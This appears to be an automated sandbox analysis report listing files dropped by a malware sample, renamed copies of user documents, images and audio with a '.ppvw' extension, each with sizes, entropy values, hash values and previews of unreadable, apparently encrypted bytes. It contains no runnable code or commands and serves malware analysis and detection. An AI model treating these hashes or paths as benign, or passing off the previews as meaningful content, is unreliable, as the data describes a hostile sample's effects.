                                                                                                                          Preview:AZTRJ.....\.N7.D.......a3e`).x6ucP.>.8.'...z..\..E....M.=.Z..}../.^..C..~....Z..uA7...!..^.<1.......n...[s...OX.}.@E..k6......B....<..... )e...:..9I..+d....).....W..c.L..%i0v.bOc.......+D#M!....@.......,.r..N%H.5.#|Md-........R......^7........%-.j.......4W...4....>5.E...Kq"..N.L...r..."...j=.L.kQQ8......$... ...J...3.HD...Fp....I...m.E.5LI.D...73..Yp.....f.T.........Nl].. a.2,u)j|......R.....L.DHc...D.l.....q....s..E....A..'1.E[...9.%...Ek.l.3..=TY...vF_..o.S%[.7..v..K.n.h......SQ..".?...X..).vC.xZ......\.Rn..A..;..........Y.Al}..YG.]\.@a...h....ml)3N..].;<s.....kS$B../;.i)../..-.a.nA...{%_.=B....A...{S...p9.*..Rd1>..mV<.#.H........t..%.1tz...U.-5.>...g(..P...BL..e.ae...m!..A&i....!.q99.t..D........q....Rd..+.......wE-.!5..j.Y..A....L.51..x...5s......Eo.S%.YV.|.,....p...1}a...'......TG.!.T..K.".R.0...e`1../?(.B..K..uA.W(.#..]......>'.k..I...E..I..C.G.ek......[..,V..$...H.C....*...........N...(.k.cEN.\.uW.i.$<.T...3....Gi6&.r}Fvp.b..+.Z..@

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\AZTRJHKCVR.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.845737323526036
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:B/pfhe4ClsL0Eo5xHHaupxWO1IDZhZMOTghgY1trG4y013uZp/eqdCqkUgtxbD:BphXL+H3pxWO1IjSbhgY1tC4Z13up/eJ
                                                                                                                          MD5:13BEB7A45B79E533A2330BDC1751A6F1
                                                                                                                          SHA1:6A817CCDA64143761E7C2F38DE6C09767DDE57B8
                                                                                                                          SHA-256:B4D3643AE66D2215B4567D4A6C188E3EB54D70D822EAAD8D1B14D6ED4C5F8EF7
                                                                                                                          SHA-512:26AEC2FA62AAB3FEB1312BECFCB6823150A8300F67307662310150544590E23915EA61C5C3EDF5F4CC7371AFCC3C90D01F71097EC3F00C5D5BAD9BD0535A8AC0
                                                                                                                          Malicious:false
                                                                                                                          Preview:AZTRJ/Q.bMVu.~o..L.._.*C.J..j.a...`.1Ra......$I.....s.zB..W:....e.M..Y`<i......l.F9....Z.UK/..U3...c .i.Z.T.>..r.S...`..qr7...j..#.....;P:..N.S..=..).b..3....|9.#.W.Q.-........WT.e.+.}....}$..3;2...U.U+..)....~.....%...Q...0.A.m.n:t..X..uZs.g^..NP,....L....v....a.j......v0+@p......Z<...!...7?..W.....0'.l.c......Ax..b......:.~......8%.RI.ra...'A."..=.{OGR....<...<..<h.yp......7b..6.o..o......n..|'.s.4..9...#'^|.C.].y.Qt`N..q$9;Tw.7$..m.:.-..4..Px..\.`..w'^..Gx.Vk....C.3..~..y.\4..s*.........Ic.fX.....|....a.[.>.Pl.\...Q.....R.... .PL.A..T-....W5..ur....>E.Q..M.CR'.j...u)E.^..$.g.k].....<i......uzT%.,.....$...H..t}..'u?\ITn.....\J.H&H R......J{.h..z.s..+../+.K..l~...?../i.g.h....a.;..a.;.u.q.}!...E.}.`J.DWbC.U.......\.H.`.^X.W..|.L..v.y.D...d.'{O......Y.~..6.....7U.9...Q].u....2....bp..Z._.......T...Ehp..../......hJ.%.l..j...b.pE..>..P.j?p.whmu..Gj5`.}..r.,........d..;.-...Xt.oZ.$=.H.......:.ad.Jb.....w+.........EC..D9.rI.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\BPMLNOBVSB.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.836359186745318
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:WOvC3/qxwaLsVOOfG1Asy3bo2rjVNWL2Yc+3b1TEbW3gYd40nKmFEbD:WQC33aLsVxsy3s2rT+xTE/AnnZOD
                                                                                                                          MD5:120594615C1859E021176AEA44714905
                                                                                                                          SHA1:2F4B4E24F5D8C8468877094AB142858CEA670B32
                                                                                                                          SHA-256:730AA47BC67367DB82AFB77C1B6F1CC0F2630E6A755948239D80378588DCEC2F
                                                                                                                          SHA-512:2DB974A762943E16A91CC47AA9A08A8E2E56B1E763B95D4580C1868F2304EB8476B55B78E81F39ACDA79F39AA32FF1744195032E98C7BA213EE44A535138BBE0
                                                                                                                          Malicious:false
                                                                                                                          Preview:BPMLN\..[}...l$......l.H.D.~.sH.^..~`Fz.:....~,..R...s6W*..SiJ....7..:...9..a.CeJ...a...,.g..A.P..#A..u.x...Y.......T+..=..Ofz...RY9...}7.P!c.....sA..M.9Bt.pVB...}.`.F8b..%...`..p.~%P$....Y(.X:.P.."'03.u..O_.x...k.x.3.......M....4..b.p.,..G...x N..Z.^.e..pr...z.WZ.`G..P.. ........$.V..F...qy.".V..s2..^.....k..p..N...rf',.W"^.....=.h.QB.._1...A.Oz.L.XF..........s..."..]...(C.....BC.O.8v./..5....9%.r.0M...n...No....NJ.]..#;..]......:D.I.z ..^.....~T....f..l..]..0..wU..S.(?.PR=..j.R...Q.(...{0...-oh.V...E..GA[..f...l..]......s.....s..-,.r.5*.w~.d.=~.`eL...KhL.q....eH5xy...(p..s....Mv...I..U.......%..)Y.s..+../7..;....=..$Yt ......@%._...q....L.{.j..fqjI...s.H..?.~sR.QN!........K..T.Vm.*H<`.O...._..A+P...=%..=l..v....<........Z.@B.....D.&.r5\.<. .%w} ....a^h..4.n..#.kZ.......fs....sk.{.5G..TD..f:..J&&...E..-.D..b........>..U...l.T8...=.V...G...~.............[.V.v..q..n~s.N.~...";.<.P..'].V....EWi.!B-..LTYs..{..kq..\..=sC.].)!...g..`...u.;.m....

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\CULUOHOPZT.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8728151694692965
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:79C/UUsQVB7tNcpujcy2+i+ctu6OZFuBcRH2mmtIH1Kh8uQTz7MNZJpJY3kbD:MhVB7Dcpmcy2jtHOiBcRH7VCU7W/J1D
                                                                                                                          MD5:EF35156985121799DEDD08EAA03C1D48
                                                                                                                          SHA1:960239B6AD6FF51C1579050D4FAC05333C9C8553
                                                                                                                          SHA-256:BEC406791D764897F107A8325D107D355426C0D2154C6F98E6A0A9FAEF72F3D5
                                                                                                                          SHA-512:30304796BB16D240D840D058AD6CFB1350D89D0E00B334BC0003BED62B93EA224CAD8216DCDCAC4CEA3583201C7CA3F6CCAB2E2606EEDC3D46B1BBC8F4EEA3A9
                                                                                                                          Malicious:false
                                                                                                                          Preview:CULUO.|.#.=[Ik....9....f...q2...a2q..V.......x./.......].M...P..I>..r.u..4........@...UW*...u..bpI.^Vde..*r...e{..... .*..zp...RhC3Wp.....>.[8...r..U....&.#O......H........*....}.N.........aDs...Qsk..Z.d%4U(.g....V.."/.W.j.).....X..[...#.f....%.b......M.L..~N....YEI.C..,..@.[;.#...k.M......{.@..#;..a]...F..Y..]..7...3..G...Z.kh.f7.\....Q.*....<...i.I..[Qg.L..!..s r.6U..U.QQ4.j]:Hg..?{.*..~....}...^a.f..'..a..C......<..(.....aV\.Us.F>...WC..m....E.....F,...M...cn.pI...-z..qSO#D.K.;.mq2.......|A.Y<w..$...-1........i_.R$Mh..^.N.qNR.....?P.vtZ\`.H.....lqA.I....TK.a.aR...W-1M.c......YX.9..O3F..=.|Y..OYi.Rn.q<......KB.LZB.`..e.|9k._.w.6..M._...Q/'..?........(X.M..{FY.R8._s.%H...K.;..t..$.w..N...C.,^p..6!L #..`..'.......7...}....YLd.-VO..u>..].a.....v...G.......qn8.-D...E8.XC...;...y1...S.-..m.........T...[..Q2.7~.0.m'f..;..t..Y\&f....7.z/o4bm.....<....t2_?:i.<......w.u.}Cl.H.._..p...)......=.-..f.K.Q?.jXK)..PM.2..<$/@>..m...... ...=.K.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\DQOFHVHTMG.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.849833705210816
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2jMq+a4bXa7oukHlIFhTEQCJ8CmfQ3aDhsRTSQ2oUjkpg7vhMZjQrfdB55urNYpo:9qQWbe8h4QA8CPqDhsNSl+Z2FBPsNYuD
                                                                                                                          MD5:43091676F889F086966EE74E5A06D891
                                                                                                                          SHA1:B1C500EFBEBD5EB384B771E8997104B2BD5A76C0
                                                                                                                          SHA-256:00A5E9035455F62D2B290525F8E7CC32FF6489AC09DD8E2AE904F69488CA5462
                                                                                                                          SHA-512:567429F5BFA389920B82CD19215E081357FE165B552C9820CC889231D3ACB82BA834C70E3B69E2E107EBEED393E2C08D20CD06F11E09B809463ACB701BAAC185
                                                                                                                          Malicious:false
                                                                                                                          Preview:DQOFH.v._..uq..dv..C.Y.D..Z....U..a.....-.....Ih g'..9{..`..c......Ud..c.....}.......L..[.H..^...6....L.-..S...D.*...............T...y.).e......[f..,(..}.E..&tD`.X\S.J...U,Iu#..|..2pL.|.>($...1..s....=......k3....`...p.:W..{t...o.=5......Q...a@.+..C*.<.%.......$.T_o...b..x.v.....*.Y..*d.n.L.........c)..)...>4...Y]........(...D.);.4.e.@.x.OhE..B.G..$X.>.]..6@."..!..i.Y.....1...e.X\...<.../.5V...}...H...@v4!.1.Tc..L..#[.H..,.}.C4...oG.6.+=.."V..8..j...1.[.M.....-.<...l....=c........6 .Iz........5..7.L.V3Q}.q<ch....._6.l;.+....Y..W....a*~r..i..@.....;..!.t.lH..._8.zZ-A7...*...t....g.....@.00E.+5'+.v...|i....V.4K.).&.....C.E.k..O......`')....>.D..=../2$...,`.\..1..7.0D.}t2|..E..C._u..L..t..>.<{oJ.{Q>]...V....._..If..of..Z....FYZ..c$....m.,.%.......{..{+?.o..%6=..>.5..#!v..By.w....Y..w.7..;=...x...DY$..K2JM..+.f..yVX....J_.>...%..4..Kx.'..W+......P..#..=.g....u.<..Z.|..RX..{.>.....L...q.J..L_h.....ov........!.\..82.pp../..`G.....dWI..I.<.y.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\DQOFHVHTMG.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.844653661567389
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:A/XZoxhc+pqY/dJRbs3TgYwPhIy7KCson+AR7CyRN52yIHHHXrkK2Ovrsbrgw+mQ:yihccqY/zRbi8Ywpb7Nn+ARWyRN50n3N
                                                                                                                          MD5:428A6093CF473E11469DB81298CEEA22
                                                                                                                          SHA1:5DB735B6E27FE676C4EDC41DE983A15AE71B0689
                                                                                                                          SHA-256:8C29677ABFCBA1800FD5B0300687799C2F2135198B005DCAE84AE9E2BB7D8C04
                                                                                                                          SHA-512:F7E101E8C77BD21A0B937BFD72177BBBD8D0EA4C0B62BFC3475227BDA97258BF4CACCED2B9EBBD84DB013B818136EF1C236B39E5AC11BDFABB9454862AD94A32
                                                                                                                          Malicious:false
                                                                                                                          Preview:DQOFH..J.c'..C...oG..+.....>..xFuEj.Q(.b.w.......IF.S..tK.L....9.<....].m.Hu...8..8..d.q..B.U.e..g....c.....=..rg.6...`$..~.W./.....<..=......^.c.'......o.a ..`.....I....K`qd....hY.._.l..a.F5^..$x....i.i.l.e%..j..|e..KR.<x.N..q.|.iBb@R.<..W...v~.ow....t.}66Wi..H(o.p.HljiVmk...O.x.i....../.......W...Xq.[.)B..L..W..]c.R..,.[..k......Q%.....t.....)t.....<......U....1.'.'.;ltb..&.C.s..D...'*.1..."..RT.f.]..`.GTx..i{..i.%k.C..A8o; +.2...I?.../H..X..W.|......[^.R.D....w..n... U.&n.5......E..R.....u...Z&...&h)l..kM}..|Mr.t.Y.uw*..y@~#.t.A.vw...pT.pX..b2.n..^...&.@IU.d.W.v]...;cV.....%...v".....,-j.f._>/:...>.;.Rq.OI>.}..k...7.<...I.z~...C.1l '..6|{...`....f..L.v.t.c).i..W..f.au.....b.IO...Ka.,.e.7x....MF.......vG#.Xq......~.... RN....x..0TEM.....o..&&#..~...19.@...k.P...k......t.3..3..R.../.u..9{=+.SX.W...p.^.}.....lh.D..''..=.....=.Y.....g.f.y.....E.....:L...@...=.p....?<IU&.....u........Q.7.......G..~...IP.....u..H.K#...-?..&Q.....*R7.:x+.i.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\DUUDTUBZFW.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.836771979682248
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:4yvWh7t0Mb2oHdzEVcuQ91zjKJlsoYmAX6egUquC5I4EHcDs7T4xaHywiNmnmbD:7A6MV9zOcu6zeJlsoYjX6NuCdDYT4xg6
                                                                                                                          MD5:E957B4E4FA1441FE0270F1AE988863AB
                                                                                                                          SHA1:5EB325B15D789E2612F1C13DF733C6582F290842
                                                                                                                          SHA-256:22B58795D3BF1D76DEBA9D6896C664659519601CCF1D571C7E94871110BFA311
                                                                                                                          SHA-512:DBFB18D22AE00144BFEC8B493F31B5F83612A440288A72818F13D00B2A4101B6C28DC105006F7933D34C87E1832F1CA8223B9CFF7A4A5B39EE3ECF884DFD5418
                                                                                                                          Malicious:false
                                                                                                                          Preview:DUUDTO.C....w.K...t.e..[g..|.|....-..gI..*.g/U....{......g*(........M...#.hCdA.j.5-vu.b.5.q.t......R.o..b.W}...T8.....O..c.o.3......t..fw..../.TY....w.oS...|..x.B..A...X.Up*..o.)....=...c....E....A.S....$.*`.K.#+N.<V,..=.^.(.Q....N..l8....3...).Y..L.....#f,j%......tP...y"....'-.i..&..}D...,.`t.h"..C.4....O..a.....B.Sh5.N....#e.|dAK.NT.P...s...r.b...?.EN.;K,O2n:K=..M...}.u.5+...a5M..W..,..1{.iX.{.e.U.-/C..i.7....Il....jtsgi.JL...._....C.&..r.!. ..G~.4..bQo...#....z.(.i......).{..+Ugf{....;*.:...SjC\6......n._O...&..[.-.o<ew...K....ai1...-..>..!...{3................l.~+.q..f,...=..;%...7....&...N...].s.DV.O...5..;.mD.<..%nE.d`...<......H..d.}..h....G...\../..=..?]....H.2.W3Z....R=.............+...\.b\..?|.4.....l.7R..=...eR..4..e..../.-pA..]._zfD..*.SD.........F.1.D1.yU.....'.`...\uIF...*...40....;.....]..j-.Pc................Qp.E=9....N.Q....."&u]]...~{.M.TD+..(@.Y..}.R50g......z.@b1.!.IEA.d*...........s...l...|0h..tma........$.Vw.Q....I

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\ERWQDBYZVW.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.861002719007977
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tHJENkLG9BvJFL74XhGvgv2GUg0xti9KLHLBWUTXCLCm7xDMqGcMcmiUx4O0oW6u:0OGDJFoRGvCh2gKD0QCLV71yiHO+7D
                                                                                                                          MD5:855529AEACDBDC586FD3972A8670B88C
                                                                                                                          SHA1:D09DB0F12942C243B55F835CC0510A2051850D5B
                                                                                                                          SHA-256:7D2195F97CEE4B17A5167029F8CF12B83F4F43FCFC7C16C3FCE8032EDD6E08BF
                                                                                                                          SHA-512:D5E9344817B7A22A62C1F07D3C9CC118CB86F8A2F8F1918023C34A1A8E84808A6860D45C112397E0B66308EC8919E4DC7BDEC57648625C6BF424C88EEE83501C
                                                                                                                          Malicious:false
                                                                                                                          Preview:ERWQD...r..Ot#,...}.f.......\h2......|......8U.<E...R......?..A.....4.......M.......y.,..Jl..>P...U/[..(..3V.BNN.8.]ZP...$-*.&.._....h..^.D.@;R..;G.......!..r.....;VZ..3./u.XulS..A..Y.>u#>.....).Q<.fE.$...S..C....?3Y...m...0-;.)).Z.$...(~...B&s.1u!E..*".:..-7...=.%Yz..b.B.`a\7{.......".Q.9.;..q.....@v.r...Z....R...l..ic.c.$....$.D...~....v..L=3.].....w%<...A.....B.cq.,.J....V$fn..b..%c+t...l.dx#..=.k.....t.F..rA... v..y.ks....&P?.s_R.d....[s1..%K..k....0.Yw.d!.C.C...._.^p...._...G...k..r..%%.S.._.y.+..,\.Q..s[..g..9^...n`v.j./.'...K,W...J..?.I#S.y...?.o.....G....W:g..P..s.{.\..MN......L.lJ.o]<J.....[De.....A ...d<V.I..x.+q../...2.+..]"....J.....Z..u.G.\..lp.@.U...+.........6%...bO...f.'P..}.O_f......RN1odWA.."^8.;../.T.......^&1asu%@'J..3.}.....ZS..|d.$.#pt....h..).7..".Ar/'t....(.a.Y.?...k.m.9r.".2.<..^..9v.~..$.|3....D...&$.E.AW.E..b*.&6...m`.3.......hJ.....C...Ru?Z...&ED^K.N.....>..Y.........Y...biH-\1.!Z...C.. ..p....E

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\FAAGWHBVUU.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.827825184580777
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tQW9f3BH6eAr7gpLr0ceaF9jEaGPBGmTDKBpxQaZ+bbAOZRuXt9Su6L4bD:XN6eKgxrkaF+kmn4ZZ/OZshuiD
                                                                                                                          MD5:425DFEE3F2CED2679796660D9E328D18
                                                                                                                          SHA1:63F202E30F0925406871C36CCCD1DD496CA7CA74
                                                                                                                          SHA-256:E0DD57D4C210F4388120FD04E690B110ED129B1F7E6A383497B57D0CE80B2D33
                                                                                                                          SHA-512:34D199310FAAB5BA39BEC78CB1EE7AC0334D2B39112F0F64A86C9C16C17148EC03C02479C9753AAD7664E26637381DD5504907DC793F42114F8F8212B0F3592E
                                                                                                                          Malicious:false
                                                                                                                          Preview:FAAGW..Z...z.....]..=2X^....)h....A.b..TK_.c.v:vX."z..X.....Mq3K+e..{..(....a.D...|.J....a..0..R..G.R*.L........i..<k.U..x7.g..)6....w.`.....}..2,UsB..T:..t?.<.K.}...75J..n....Y..\i..gf....vM|..%H?.`T......|.{..(..I..x...s{j/y+2q.v%..z...kXU.B..A<.7.I.5.....|...q..<....C..>&.../=.T...J...R*.Y...ZK{L....../......,.....m._.&...[..s...nU...D.......g,..rC.6....|..........+)_.........;...y0e..;'lW.8QZ~.t.Q_(.'.'f.%..5..\y...b.~.a...d.|..73.Am..k.c.I..w....@.i.k.LE..p...~~...$.Y.Z................L.&.}..0..b... l...g.W...NB....;o..Sm8.+.S..b...c|..q..o.0.6..Jlz.Ar..i...Q6....+......rJiv.m\..}.[...j....Mu.P:.*........eb...F..>.....@..G.........+.-.;.%j...c.....K.....uT&kH~.~.:?.;W.AVcT.,..,6~D......Ws.....v,-.1N.u..9.Ed.._.j.(.fO.mF..'.Y:.....R\A.2..n.m.-..f."....r=..`tE.G)...|.u.5..5|C7).l..._...ImH.t!...Z...\am[....VFR...W..T%.w.4.o.|j.Sb.@......m....^.U........F.F.ia..3.....o2w7."4.x..5.r..Y|.....93.VR..L...zk.5GZ...G.,b..7F}@9..q...V..P

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\FENIVHOIKN.docx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.833819479216409
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:v+cD8hjcE3xdsSnk/3df4QuE8uTlH7LpCP9HTWm8JA4/cPbD:vnDDE3bTk/3v9x3pmNye4/iD
                                                                                                                          MD5:6EDC802FF80E3281321DFE88766D53DF
                                                                                                                          SHA1:E274C4F73B43F40E66DD02584243F2EBB0B58E11
                                                                                                                          SHA-256:F28F1E1465AC0A174DF7863BC70CD15BDAD898A8471F4E16D168F0D843946EAB
                                                                                                                          SHA-512:ED17B52CFB167D8F09DB13C3A95A490F29B1EECE7E4B41F06BF37CF109D8887668C620550A9C5240C45BAE6C5C2FDC5BF46B1F93F264DEFF0C266772FAB09FC4
                                                                                                                          Malicious:false
                                                                                                                          Preview:FENIV\.5."..&=5..j.cp.B..-w3..q..F.........{5.|...V....Q{D..me_.)J......b.%`+.....+..../4....p.....Y.../m3......A..R.Ff.....H.:M:.{,.)f.=>(;5.].\e#4.x....7..5N.5.R..YCp..7.g.....R:.z.t....a..d.hA...e..(Sq.....ONX~..+..jO.{......^..r..-F..C.L.2..:..?zjE.8...>.=O....p....z.......V.mphE...E.5..../..6..x..%....(..{.5..8.R..$.}^u.k"1..2...B.R.. .Qk&......s.........S.?X..o..Vd.q3q|r....f(x.N(.lA~!..A........:.f...:N].>....p3.._).....8.IXr.~...L...~.Pq..:#..]..C...Q&.tX.A.Jcm....=.'nI..G...?L.\.|.....Ei..@......$0./....v..M....s.......*..z.).M...7..Ph6....q.{b.h..g.x.9.........+.\I.%,..w.~..SF`.rcQ._P._G.xt^.65*s.U...N_..}....0.{.B..9.}.*>....Z..'O.,.(s..l....U.^.....V.s..&.)Z.....*....Ulq..uy..:.\.9t6..dZ..Ns.R^..(.b.....V.z,h.Q/..L....9P.L5T./x..$....p.R.Dq.....M.8..?c.A;].$sG:..bY.....}....{/..u.;.K...8g7|gE.{/a.=*.t..U.F....d.`..s.f..y.*.3H6..B'...wE.....]..T..... .0cGcX...`.............Y...-...LX.....P....Y@.j....A=.y...'..uNx...]n.........y..ar.d.C.<....

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\FENIVHOIKN.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8332912263665175
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:A4iZ37Rt8m1NT18AED3X5QJ80D3Y4+q7HmUHTchpgsLj3brbD:ZI3VpN5+jc+wHfHTGbD
                                                                                                                          MD5:670B46BCB2FA4E57CB973926192DFB74
                                                                                                                          SHA1:6951D2F7E46F5C7AF362995EC0C517AA49BE6753
                                                                                                                          SHA-256:7E904E981A62430251AEE7271D7C6CB1780D841D4DA3B1B24D758A7531E4F56B
                                                                                                                          SHA-512:60E1DE97D0875A0061D75BFA62DB34C12237560BB2BBD35A172CB7015AB3036BB9407B21CDE7F2E034D99F187ADE625249E1F6717F549607D916D81E61F3D1A4
                                                                                                                          Malicious:false
                                                                                                                          Preview:FENIV5.Vd'..f!..+..!..fu.J.3...;[......O..S.Ye.o~j$..c...1"/.w5....2..A......?.a.....H...i.2A...T"....;:.y....+..e..!.>].1..+2\....Dc.K..;.?.g.-3.... 4....jE.M.X....l....."....r.L......`.1U0./.E0.O.6...-C....K..vV.WI.H/......0..*..z.......j>.._N..8.U...I.L8..hXn+.|...wT.W>...6..t....Ng.R...'.?..[..~.0.4z.Fq._.....?..CiB9.....c..~E....h...#..mC..Vh.E.z<...Md.V....f.J.....~XB................_....6.c.x4{....r.w+....1.[.Ka....R.E{.._...A.~.O...8..TEX..SY%$....a..lZ..[.Zp]..w4g?....4)&]...:.. .#...f_...kG.Nbs.m.7@..._..&-'Fz.D+.+8+5...V.v.Be.H.\.9=0Iss.<p....B.3.e....I.r..p.41.cL..'...G.z.{......>..]....].-...%....{-~..g.i/g..J....w..-.4L.....V..j.;..1.P.O.... .....(.v..1...9'.*...z.NB....".(J.6..............q..$.9........F.....3...'.3.(..w.Y.m...j.t....2tiy.o.....'.n..Zp.X(..L.<....nr...AD&C......HG.+.<[.r.....:.l.S.....t..!G......g:......:.D[~...R.UB....IY..0......g8.4...ON.J>e\...I4R{w.;:....Qc...)"....>.ZX.`.c.E....#!..k.g.~a.....R....

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\FENIVHOIKN.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.863219859972402
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:pb00vZjPvWYSiPs7ud1xdJR9Ge70ZswMjcN2ixDwOjYJPbD:y0vZjvSiP0ODdJ7z0ZsREnKOiD
                                                                                                                          MD5:73F00CDAB22EC20962CE035A69F8421D
                                                                                                                          SHA1:6101E2A5D45CE0BA53A473C932DD9D758F96C64C
                                                                                                                          SHA-256:120AE2A30162C64BBD2C61E1CFE85EECDFD651358502F6C5ABCA62A57092AAE6
                                                                                                                          SHA-512:5E1B5FA80EC58ECDE95A7E6A961BC7C10A2C48AEBFB3B704F2E916671FC2A490726B599D8059121F779A6A00837F0C883EDCF20B6377ED0836F9B04897D81DFD
                                                                                                                          Malicious:false
                                                                                                                          Preview:FENIV.....L../....<J.......?......P.Z....h{R.b.@.<4]..%.H...AO,......p....\...*sJ.p.>!CH..b.. x.V7..7...w.D.i.F.[....<g ..W......]T/rjH&...~..$.....0j..........S................\...].:)........NW.N.....cK...)S.\BB......=5....g.,b.......1.ip.9.3.0K.s"-.T.....F.$.0.^...5/1.....G.Rkn+....:%!.f*S....:}M...A....1......N...T..!.dD;...x9E.....%wS.M..l............c.....P.x....NT!5r....K...M..% .^.Wb.:nF.=.<..(.s.?..}T..A.y..M.e.o.5T..Mo...[.m..vx.4..}...w....J..7#0..?6 .Xl..&^1...-.gS..z.3%..r.rZ.....#3.^C.#...r..%_.......ty.b.'G!......QAh..S<CO...F..v.........^`*...U.Yl...d..`..a....(c.q.W&\II..P.....jA..........J...".}.i|...!AG....v.F..|.,.J..(..].kv.....dT"...X|[a...KME.......G.%4.K..(D...S#.t.."T..fa.J|..|....+...z....[...>K."....p..Z-..`o.W...."x.w..z.%=T.W.......g.$4.r...6>.5..?.....G.z.T...,.......D...../c.*.G...1v....B,.w..pF..i..'..&......z...@<QkW....:.*=...Y8.zH3XP...%/.vVj~}!!..l....S.}I.K.l..:.novv8k`~<`..#..D..Y=e...N.p...T!z.. ..".

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\HTAGVDFUIE.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.839997606643772
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2sL3x6L7NOOG4tkWZt9VQ4SaqSDPNZKyX5lHyW0C+geDJI405JlbXg1UbD:283x6Lc6hVSarLNZKkn5eVIr5JlbX++D
                                                                                                                          MD5:5D755A9DF650F78D2BE3711424F5D22F
                                                                                                                          SHA1:CC10B16303B3793B7AC38BFE13F04295EE645514
                                                                                                                          SHA-256:E2E17D07C59279961C0B570661DD3D28FACA107DB2FD9E0E5F3A1C5964EA7F31
                                                                                                                          SHA-512:431BB1F81D4D5193F65D16B47C4E401B2A4749AE103C30B99C3D4070E1B40689FBADF7B9A942FE944982D4FB7E66AD56BB44889687C2836837D708E3E89255E4
                                                                                                                          Malicious:false
